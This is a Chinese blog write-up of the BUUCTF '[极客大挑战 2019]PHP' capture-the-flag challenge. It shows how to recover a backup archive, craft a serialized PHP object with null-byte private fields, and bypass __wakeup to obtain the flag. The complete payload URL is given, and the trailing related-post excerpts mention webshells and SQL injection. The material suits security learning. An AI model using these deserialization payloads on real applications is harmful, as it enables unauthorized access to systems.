web:[极客大挑战 2019]PHP

最新推荐文章于 2024-08-22 09:44:18 发布
最新推荐文章于 2024-08-22 09:44:18 发布
阅读量7.6k 收藏
点赞数 1
分类专栏: BUUCTF-WEB 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gsumall04/article/details/133443450
版权

题目

点进页面显示如下

根据页面提示,这个网站有备份文件,备份文件一般是bak文件格式,用dirsearch扫描

访问之后下载了一个文件

里面都是一些代码

在index.php中发现了一个类的文件,一个get传参,然后将传进的值进行反序列化

在class.php中,如果username===admin,password=100,返回flag

构造一个反序列化

<?php
 
class Name{
    private $username = "admin";
    private $password = 100;
}
$a = new Name();
$str=serialize($a);
echo $str;
?>

Name和password之间有不可见字符,private声明的字段为私有字段,只在所声明的类中课件,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)

所以因改为

O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

这里还需要绕过__wakeup函数

构造payload

?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;}

总结

1.从__destruct,__construct,__wakeup可以判断存在反序列化漏洞

2.php序列化与反序列化
序列化:函数为serialize(),把复杂的数据类型压缩到一个字符串中 数据类型可以是数组,字符串,对象等
反序列化:函数为unserialize(),将字符串转换成变量或对象的过程
常用的内置方法:
__construct():创建对象时初始化,当一个对象创建时被调用
__wakeup() 使用unserialize时触发
__sleep() 使用serialize时触发
__destruction():结束时销毁对象,当一个对象销毁时被调用

3.private声明的字段为私有字段,只在所声明的类中课件,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上ascii为0的字符(不可见字符)

4.__wakeup函数绕过

在反序列化字符串时,属性个数的值大于实际属性个数时,会跳过 __wakeup()函数的执行
原本:O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}
绕过:O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

参考学习链接:

[极客大挑战 2019]PHP

[极客大挑战 2019]PHP unserialize_buuctf [极客大挑战 2019]php-CSDN博客

sleepywin
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
GeekUniversityWebTask:极客大学前端训练营作业
04-18
【标题】"极客大学前端训练营作业"揭示了这个压缩包内容主要涉及的是极客大学(GeekUniversity)组织的前端开发学习任务。在这个训练营中,学员们可能通过一系列练习和项目来提升自己的前端技能,特别是JavaScript...
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
BUUCTF-Web:[极客挑战 2019]Upload
m0_56161093的博客
05-29 869
题目 解题过程 1、上传文件 从网页上来看是上传一个图片文件,但我们不知道他的检查上传的文件,所以可以试一试上传各种文件。一般检查文件的地方有:后缀名、content-type、文件头的部分内容。 这里我们先上传一个php文件,不做任何修改。如下图: 结果如下: 2、修改文件后缀名和content-type 将文件名修改为test.phtml,绕过常规php文件后缀检测 将文件类型修改为:image/jpeg 注意:phtml一般是指嵌入了php代码的html文件,但是同样也会作为php解析 修
BUUCTF WEB [极客挑战 2019]PHP
Y1da的博客
04-16 991
BUUCTF WEB [极客挑战 2019]PHP 题目提示网站存在备份,使用御剑扫描目录,发现备份文件 http://9ce7b58e-0829-4ed4-b7ca-7a1b7fd02741.node4.buuoj.cn:81/www.zip 下载后解压,得到index.php、class.php、flag.php等文件。 index.php(部分代码) <?php include 'class.php'; $select = $_GET['select']; $res=unser
【BUUCTF-Web】 [极客挑战 2019]PHP
RexHa的博客
09-04 750
【BUUCTF-Web】 [极客挑战 2019]PHP
web:[极客挑战 2019]LoveSQL
sleepywin的博客
09-29 486
用union来查询测试注入点,查看回显点CTF-Web-[极客挑战 2019]LoveSQL - 知乎LoveSQL-CSDN博客。
BUUCTF,Web:[极客挑战 2019]EasySQL
Pai_Space
01-07 671
你有一个错误在你的SQL语法;检查MariaDB服务器版本对应的手册,在第1行'123'附近使用正确的语法 Select user_id,user_type,email From users Where user_id=’用户名’ And password=’密码’ select*fromadminwhereusername='用户输入的用户名'andpassword='用户输入的密码';select*fromuserwhereu...
BUUCTF Web [极客挑战 2019]Secret File
2401_84247423的博客
05-16 1082
喜欢一个东西首先要先学会「尊重」,虽然网络安全的圈子不乏各种灰产,以及高调宣传自己是黑客的脚本小子,但不可否认,这个圈子仍有不少人保持着「举世皆浊我独清,众人皆醉我独醒」的心态,努力磨砺技术,提升自身修养,让互联网变得更加安全。
BUUCTF[极客挑战 2019]PHP1题解
cxm4545的博客
04-26 808
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
BUUCTF[极客挑战 2019]Knife
2302_78972359的博客
05-02 417
这种木马通常利用系统的漏洞或弱点进行渗透,例如未授权访问、文件上传漏洞、代码注入等。攻击者可以通过发送恶意请求,将一句话木马插入到目标系统的可执行文件、数据库、网页等位置,然后通过浏览器或其他工具访问木马文件,从而获取对受攻击系统的控制权。一句话木马的特点是使用简洁的语法和功能强大的命令执行功能,可以通过与恶意控制端进行通信,执行各种操作,例如上传/下载文件、执行系统命令、创建用户、修改文件权限等。提示我们用菜刀,我这里用的是蚁剑,这个Syc就是我们连接服务器的密码。连接上后查看根目录,看有没有flag。
web:[极客挑战 2019]HardSQL
sleepywin的博客
10-19 469
这里按照常规思路继续使用order by函数和union select函数进行查询,但是页面没有任何显示。这里也是显示不全,按照上面的updatexml后的方法进行补全即可。这里空格和=没有,使用()代替空格,使用like代替=题目名为hardsql,先来尝试有无sql注入存在。查看源代码没有发现其他的提示信息,随便尝试一下。发现flag显示不全,函数显示有字符数限制。先查询数据库,构造payload。查询表,构造payload。查字段,构造payload。可得知数据库名为geek。
[极客挑战 2019]PHP
Knsec
05-18 2357
[极客挑战 2019]PHP
微信小程序demo:极客学院
03-15
一个同学的毕业设计,微信小程序也可以做成毕业设计了吗?   免责声明:本站所有文章和图片均来自用户分享和网络收集,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的...
GeeksCoding:极客编码
05-09
在“GeeksCoding:极客编码”项目中,我们聚焦于提升编程技能,特别是针对Java和JavaScript这两种广泛使用的编程语言。这个项目包含了针对Java 8和JavaScript(包括ES5和ES6版本)的编码练习,旨在帮助开发者磨练他们...
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?的库之 jQuery UI【】7、常?的库之 jQuery Mobile【】8、常用的库之...
推荐一个完全自由的目录设计网站
最新发布
qq_30049249的博客
08-22 439
因此,如果想在网站上写一本自己的书,我们需要一个目录设计的工具。现在,我们点击全部,看到自己的所有文章。这样,先创建各级栏目,再将文章拖动到各级栏目,就实现了对文章到整理。上面的链接提供参考,这里主要介绍其中的目录设计工具,也叫栏目设计。好,现在我们来出一本书,想一个名字,就叫《学习PHP动态网站开发》如果我们能通过网站出一本书,这将是一件很酷的事。事实上,我们通过网站发布知识,最常见的是写博客。先点击所有,查看子栏目和文章,然后进行拖动排序。好,本文说的是完全自由的目录设计,有多自由呢?
day32(8/20)——playbook剧本安装nginx、roles
wh992610的博客
08-21 858
roles(⻆⾊): 就是通过分别将variables, tasks及handlers等放置于单独的⽬录中,并可以便捷地调⽤它们的⼀种机制。假设我们要写⼀个playbook来安装管理lamp环境,那么这个playbook就会写很⻓。所以我们希望把这个很⼤的⽂件分成多个功能拆分, 分成apache管理,php管理,mysql管理,然后在需要使⽤的时候直接调⽤就可以了,以免重复写。就类似编程⾥的模块化的概念,以达到代码复⽤的效果。
linux基本指令
m0_64450406的博客
08-20 711
vi/vim有三种基本模式:普通模式(Normal Mode)、插入模式(Insert Mode)和命令行模式(Command-line Mode)。-t 或 --date=时间:使用指定的时间(而不是当前时间)来设置文件的访问和修改时间。-d 或 --date=字符串:使用指定的字符串来设置文件的访问和修改时间。进入vi/vim:在终端中输入vi或vim后跟文件名,如果文件不存在,将创建该文件。-r 或 --reference=文件:使用指定文件的访问和修改时间来更新目标文件的访问和修改时间。
DHCP原理与配置
WJC_manong的博客
08-20 773
DHCP(DynamicHostConfigurationProtocol,动态主机配置协议)通常被应用在大型的局域网络环境中,主要作用是集中地管理、分配IP地址,使网络环境中的主机动态的获得IP地址、Gateway地址、DNS服务器地址等信息,并能够提升地址的使用率。DHCP作为用应用层协议,它依靠并且使用着传输层中udp协议。对于DHCP中分为客户端,和服务端。客户端用的端口为68,服务端的端口为67。
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值